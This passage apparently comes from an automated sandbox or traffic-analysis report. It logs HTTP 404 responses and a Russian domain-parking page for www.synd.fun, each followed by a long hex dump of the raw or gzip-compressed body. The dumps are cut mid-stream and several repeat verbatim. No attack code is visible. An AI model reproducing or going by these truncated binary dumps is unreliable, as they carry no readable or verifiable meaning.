64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:52:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3e e7 5c 92 a2 64 c9 71 92 b5 ab 00 5b d4 e5 7d 39 f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 5f d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 d4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e e3 1d 97 7a 72 a0 1a a5 a1 0c fa 8e d7 2d 09 db f7 22 e5 a1 52 a0 ba c1 c8 08 d0 e7 74 cd 4d 47 6d 0d fd 20 2a 54 dd 72 3a 51 af d1 51 9b 8e ad 0c fe 51 73 3c 27 72 a4 6b 84 b6 74 55 63 19 5d 44 4e e4 aa e6 d6 d6 96 19 8e bd 8e b9 31 f2 ea 96 2e ab bb 8e d7 17 81 72 1b a5 30 1a bb 2a ec 29 85 ee 07 aa e3 c8 46 49 ba 6e 49 f4 02 b5 91 0b c9 42 19 72 14 f9 a6 1d 86 e8 7a d2 de 81 f8 59 ed 0d 09 79 7c cf c4 bf d5 e5 92 20 bd 41 4d 03 d9 55 d6 15 83 2b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 73 eb c7 ac 23 5b 8e d7 f1 b7 cc 28 90 76 7f 8d 2b 5c f4 65 47 34 04 64 b6 23 c7 f7 2a d5 ab d7 57 8e 58 c7 2e 5f 6e 1e b3 ea 56 da 49 da 99 f0 3d 17 d5 1b a5 f9 dd 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 be 0a 02 3f 38 64 83 9a 58 46 9b 30 b0 1b a5 62 47 b0 46 66 dd 51 b4 c1 d6 7d 66 b9 08 2a 30 18 69 24 3c b4 6c b3 8d 8a f2 cd bc 3b 48 46 4b e3 b4 ed 77 c6 19 a2 db c6 10 b6 12 fa ab 45 e6 6b a5 28 e5 32 c6 eb e4 a9 d5 ee b6 5c a7 db 8b 80 07 ea 4b 05 c5 7e b8 72 ab 95 be a0 2e a7 4a 74 ef 29 d6 3b ce e6 c2 a6 86 e7 47 24 52 a4 ae 60 a0 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 8f f7 e2 dd e4 83 e4 06 9e 77 f1 b7 17 6f c7 77 e8 f5 f6 92 d7 0e 87 2b 75 78 a1 f6 d7 b6 41 a8 cd b0 da 8b a2 61 78 d6 b2 e0 74 26 dc 56 3b 83 e7 6f f8 ae eb 6f 09 cf f7 87 0a 28 c1 03 fc 00 68 51 01 f0 2c 83 2e 39 73 ab 0d 6f ef 43 98 bf d1 e8 66 f2 7e 72 b3 6e c9 66 dd c2 3c 9a f5 99 c9 74 55 ab 95 7a b8 b1 15 c8 e1 10 9d a6 0a 9e 2d 6f b1 2f b6 e0 0b a0 83 85 95 d8 2c 3d 3f 8c 40 1e 46 18 c9 c8 b1 61 80 99 51 a7 74 6d a4 e3 93 9d 96 27 da 98 b1 88 c1 d4 50 9a e1 8b de 72 b3 3e 5c dc a6 a3 34 7a e1 a2 cf 6e a3 7a 3b 68 c6 bb da 4c f1 13 b2 5f fc 84 6d fa 60 9f 15 a7 54 3d 5c 34 dd f6 28 8a 7c 2f cc f4 8c f9 16 8c af 5f 42 4a fd 00 e5 bb 7e d0 62 eb 2a cf 26 88 a5 2f 42 e7 3d d5 82 dd 07 d2 65 23 a4 ba cc db e7 7a 4b eb b3 41 c0 c1 85 2e 86 b2 d3 81 79 5a 2e 21 66 16 71 44 c8 1a 75 d6 56 cf 77 42 6b d5 ee 29 bb df 58 ea 70 60 28 f2 f5 92 1c 0c 57 50 b7 15 fa a3 c0 56 8d 6c 68 62 e2 52 f3 37 d4 9a 90 27 8a f3 24 47 29 ca cd 54 5d f0 bf 83 e7 d1 f1 07 d2 c9 09 3d 73 92 82 c8 ba 82 e5 a9 2d 6b 75 14 0d 32 c9 a6 a4 a6 72 8a 25 a3 41 26 f1 12 15 d9 98 8d 74 ba 5e 23 84 62 bc 4e 0b 7d 1c 3c c1 f8 1f 00 c2 7f e3 1d 91 7c 14 ef 25 9f 24 37 45 7c 3f f3 ff a3 05 97 0b 87 d2 9b 83 d1 61 e0 0f 7c 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:52:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3e e7 5c 92 a2 64 c9 71 92 b5 ab 00 5b d4 e5 7d 39 f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 5f d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 d4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e e3 1d 97 7a 72 a0 1a a5 a1 0c fa 8e d7 2d 09 db f7 22 e5 a1 52 a0 ba c1 c8 08 d0 e7 74 cd 4d 47 6d 0d fd 20 2a 54 dd 72 3a 51 af d1 51 9b 8e ad 0c fe 51 73 3c 27 72 a4 6b 84 b6 74 55 63 19 5d 44 4e e4 aa e6 d6 d6 96 19 8e bd 8e b9 31 f2 ea 96 2e ab bb 8e d7 17 81 72 1b a5 30 1a bb 2a ec 29 85 ee 07 aa e3 c8 46 49 ba 6e 49 f4 02 b5 91 0b c9 42 19 72 14 f9 a6 1d 86 e8 7a d2 de 81 f8 59 ed 0d 09 79 7c cf c4 bf d5 e5 92 20 bd 41 4d 03 d9 55 d6 15 83 2b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 73 eb c7 ac 23 5b 8e d7 f1 b7 cc 28 90 76 7f 8d 2b 5c f4 65 47 34 04 64 b6 23 c7 f7 2a d5 ab d7 57 8e 58 c7 2e 5f 6e 1e b3 ea 56 da 49 da 99 f0 3d 17 d5 1b a5 f9 dd 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 be 0a 02 3f 38 64 83 9a 58 46 9b 30 b0 1b a5 62 47 b0 46 66 dd 51 b4 c1 d6 7d 66 b9 08 2a 30 18 69 24 3c b4 6c b3 8d 8a f2 cd bc 3b 48 46 4b e3 b4 ed 77 c6 19 a2 db c6 10 b6 12 fa ab 45 e6 6b a5 28 e5 32 c6 eb e4 a9 d5 ee b6 5c a7 db 8b 80 07 ea 4b 05 c5 7e b8 72 ab 95 be a0 2e a7 4a 74 ef 29 d6 3b ce e6 c2 a6 86 e7 47 24 52 a4 ae 60 a0 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 8f f7 e2 dd e4 83 e4 06 9e 77 f1 b7 17 6f c7 77 e8 f5 f6 92 d7 0e 87 2b 75 78 a1 f6 d7 b6 41 a8 cd b0 da 8b a2 61 78 d6 b2 e0 74 26 dc 56 3b 83 e7 6f f8 ae eb 6f 09 cf f7 87 0a 28 c1 03 fc 00 68 51 01 f0 2c 83 2e 39 73 ab 0d 6f ef 43 98 bf d1 e8 66 f2 7e 72 b3 6e c9 66 dd c2 3c 9a f5 99 c9 74 55 ab 95 7a b8 b1 15 c8 e1 10 9d a6 0a 9e 2d 6f b1 2f b6 e0 0b a0 83 85 95 d8 2c 3d 3f 8c 40 1e 46 18 c9 c8 b1 61 80 99 51 a7 74 6d a4 e3 93 9d 96 27 da 98 b1 88 c1 d4 50 9a e1 8b de 72 b3 3e 5c dc a6 a3 34 7a e1 a2 cf 6e a3 7a 3b 68 c6 bb da 4c f1 13 b2 5f fc 84 6d fa 60 9f 15 a7 54 3d 5c 34 dd f6 28 8a 7c 2f cc f4 8c f9 16 8c af 5f 42 4a fd 00 e5 bb 7e d0 62 eb 2a cf 26 88 a5 2f 42 e7 3d d5 82 dd 07 d2 65 23 a4 ba cc db e7 7a 4b eb b3 41 c0 c1 85 2e 86 b2 d3 81 79 5a 2e 21 66 16 71 44 c8 1a 75 d6 56 cf 77 42 6b d5 ee 29 bb df 58 ea 70 60 28 f2 f5 92 1c 0c 57 50 b7 15 fa a3 c0 56 8d 6c 68 62 e2 52 f3 37 d4 9a 90 27 8a f3 24 47 29 ca cd 54 5d f0 bf 83 e7 d1 f1 07 d2 c9 09 3d 73 92 82 c8 ba 82 e5 a9 2d 6b 75 14 0d 32 c9 a6 a4 a6 72 8a 25 a3 41 26 f1 12 15 d9 98 8d 74 ba 5e 23 84 62 bc 4e 0b 7d 1c 3c c1 f8 1f 00 c2 7f e3 1d 91 7c 14 ef 25 9f 24 37 45 7c 3f f3 ff a3 05 97 0b 87 d2 9b 83 d1 61 e0 0f 7c 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:52:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3e e7 5c 92 a2 64 c9 71 92 b5 ab 00 5b d4 e5 7d 39 f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 5f d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 d4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e e3 1d 97 7a 72 a0 1a a5 a1 0c fa 8e d7 2d 09 db f7 22 e5 a1 52 a0 ba c1 c8 08 d0 e7 74 cd 4d 47 6d 0d fd 20 2a 54 dd 72 3a 51 af d1 51 9b 8e ad 0c fe 51 73 3c 27 72 a4 6b 84 b6 74 55 63 19 5d 44 4e e4 aa e6 d6 d6 96 19 8e bd 8e b9 31 f2 ea 96 2e ab bb 8e d7 17 81 72 1b a5 30 1a bb 2a ec 29 85 ee 07 aa e3 c8 46 49 ba 6e 49 f4 02 b5 91 0b c9 42 19 72 14 f9 a6 1d 86 e8 7a d2 de 81 f8 59 ed 0d 09 79 7c cf c4 bf d5 e5 92 20 bd 41 4d 03 d9 55 d6 15 83 2b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 73 eb c7 ac 23 5b 8e d7 f1 b7 cc 28 90 76 7f 8d 2b 5c f4 65 47 34 04 64 b6 23 c7 f7 2a d5 ab d7 57 8e 58 c7 2e 5f 6e 1e b3 ea 56 da 49 da 99 f0 3d 17 d5 1b a5 f9 dd 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 be 0a 02 3f 38 64 83 9a 58 46 9b 30 b0 1b a5 62 47 b0 46 66 dd 51 b4 c1 d6 7d 66 b9 08 2a 30 18 69 24 3c b4 6c b3 8d 8a f2 cd bc 3b 48 46 4b e3 b4 ed 77 c6 19 a2 db c6 10 b6 12 fa ab 45 e6 6b a5 28 e5 32 c6 eb e4 a9 d5 ee b6 5c a7 db 8b 80 07 ea 4b 05 c5 7e b8 72 ab 95 be a0 2e a7 4a 74 ef 29 d6 3b ce e6 c2 a6 86 e7 47 24 52 a4 ae 60 a0 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 8f f7 e2 dd e4 83 e4 06 9e 77 f1 b7 17 6f c7 77 e8 f5 f6 92 d7 0e 87 2b 75 78 a1 f6 d7 b6 41 a8 cd b0 da 8b a2 61 78 d6 b2 e0 74 26 dc 56 3b 83 e7 6f f8 ae eb 6f 09 cf f7 87 0a 28 c1 03 fc 00 68 51 01 f0 2c 83 2e 39 73 ab 0d 6f ef 43 98 bf d1 e8 66 f2 7e 72 b3 6e c9 66 dd c2 3c 9a f5 99 c9 74 55 ab 95 7a b8 b1 15 c8 e1 10 9d a6 0a 9e 2d 6f b1 2f b6 e0 0b a0 83 85 95 d8 2c 3d 3f 8c 40 1e 46 18 c9 c8 b1 61 80 99 51 a7 74 6d a4 e3 93 9d 96 27 da 98 b1 88 c1 d4 50 9a e1 8b de 72 b3 3e 5c dc a6 a3 34 7a e1 a2 cf 6e a3 7a 3b 68 c6 bb da 4c f1 13 b2 5f fc 84 6d fa 60 9f 15 a7 54 3d 5c 34 dd f6 28 8a 7c 2f cc f4 8c f9 16 8c af 5f 42 4a fd 00 e5 bb 7e d0 62 eb 2a cf 26 88 a5 2f 42 e7 3d d5 82 dd 07 d2 65 23 a4 ba cc db e7 7a 4b eb b3 41 c0 c1 85 2e 86 b2 d3 81 79 5a 2e 21 66 16 71 44 c8 1a 75 d6 56 cf 77 42 6b d5 ee 29 bb df 58 ea 70 60 28 f2 f5 92 1c 0c 57 50 b7 15 fa a3 c0 56 8d 6c 68 62 e2 52 f3 37 d4 9a 90 27 8a f3 24 47 29 ca cd 54 5d f0 bf 83 e7 d1 f1 07 d2 c9 09 3d 73 92 82 c8 ba 82 e5 a9 2d 6b 75 14 0d 32 c9 a6 a4 a6 72 8a 25 a3 41 26 f1 12 15 d9 98 8d 74 ba 5e 23 84 62 bc 4e 0b 7d 1c 3c c1 f8 1f 00 c2 7f e3 1d 91 7c 14 ef 25 9f 24 37 45 7c 3f f3 ff a3 05 97 0b 87 d2 9b 83 d1 61 e0 0f 7c 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:52:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 31 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 79 6e 64 2e 66 75 6e 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:53:01 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13840X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:53:03 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13840X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 